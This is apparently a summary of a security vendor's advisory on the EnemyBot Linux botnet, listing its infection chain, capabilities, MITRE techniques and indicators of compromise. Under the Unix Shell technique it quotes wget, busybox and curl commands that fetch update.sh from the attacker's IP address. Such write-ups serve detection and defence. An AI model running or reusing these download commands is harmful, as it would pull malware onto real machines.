Threat Research

Detecting EnemyBot – Securonix Initial Coverage Advisory

Securonix

EnemyBot is a Linux-based botnet targeting a broad range of Linux devices with multi-architecture ELF payloads. The report details its infection chain, capabilities (network scanning, flooding, and data exfiltration), observed indicators of compromise, and mitigations. #EnemyBot #LolFMe #Mirai #ELF #Linux #IoT #RCE #198.12.116.254 #Securonix

Keypoints

  • EnemyBot is designed for wide Linux device support, including 13 ELF binaries for different architectures (e.g., enemybotx86, enemybotarm, enemybotmips, etc.).
  • The initial infection uses a drive-by approach to fetch payloads from a remote server, with multiple methods to download update.sh (wget, busybox, curl).
  • The update.sh script attempts to download 13 architecture-specific binaries, appending the architecture to the binary name, enabling multi-architecture reach.
  • Infection steps include setting execute permissions (777), running from /tmp, and deleting the original ELF binary, indicating clean-up behavior.
  • Dynamic analysis reveals extensive networking options (port scanners, TCP/UDP floods) and general system enumeration, with much of the code encrypted to hinder analysis.
  • Data exfiltration is performed via HTTP POST to the attacker’s IP, showing data theft capabilities beyond access.
  • The malware displays counter-forensics and a hello-like string (“watudoinglookingatdis”) and shows suspected lineage with LolFMe and Mirai patterns and multi-architecture RCE footholds.

MITRE Techniques

  • [T1189] Drive-by Compromise – The malware delivered via a drive-by attack to a web server with a payload in the value string. “[drive-by attempt to /shell at a web server with an interesting payload attached to the ‘value’ string.]”
  • [T1105] Ingress Tool Transfer – The malware downloads update.sh and 13 ELF binaries for various architectures. “[the malware attempts to download 13 different ELF binaries…]”
  • [T1059.004] Unix Shell – Execution uses shell commands (wget, busybox, curl) to fetch payloads. “[wget http://198.12.116.254/update.sh -O update.sh; busybox wget …; curl http://198.12.116.254/update.sh -O update.sh]”
  • [T1027] Obfuscated/Compressed Files and Information – Much of the code appears encrypted to hinder analysis and counter forensics. “[much of the code appears to be encrypted and we encountered some counter forensics …]”
  • [T1041] Exfiltration Over C2 Channel – Data stolen via HTTP POST back to the original IP. “[the malware also appears to have the ability to steal data via HTTP POST, which in our case, the malware was sending the data back to the original IP address.]”
  • [T1046] Network Service Scanning – Includes port scanners and TCP/UDP flood options as part of its networking capabilities. “[networking options such as port scanners, TCP/UDP flood options and general system enumeration.]”
  • [T1082] System Information Discovery – General system enumeration to understand the host environment. “[general system enumeration.]”

Indicators of Compromise

  • [File Name] IoCs – update.sh, enemybotarm
  • [SHA256] File Hashes – cc36cc84d575e953359d82e8716c37ba2cbf20c6d63727ca9e83b53493509723, 52421da5ee839c9bde689312ff35f10e9bcab7edccc12ee1fe16630e20531aaf and 2 more hashes
  • [SHA256] File Hashes – enemybotx86 – 1a7316d9bb8449cf93a19925c470cc4dbfd95a99c03b10f4038bb2a517d6ed50 and 12 more hashes
  • [IP Address] IoC – 198.12.116.254

Read more: https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/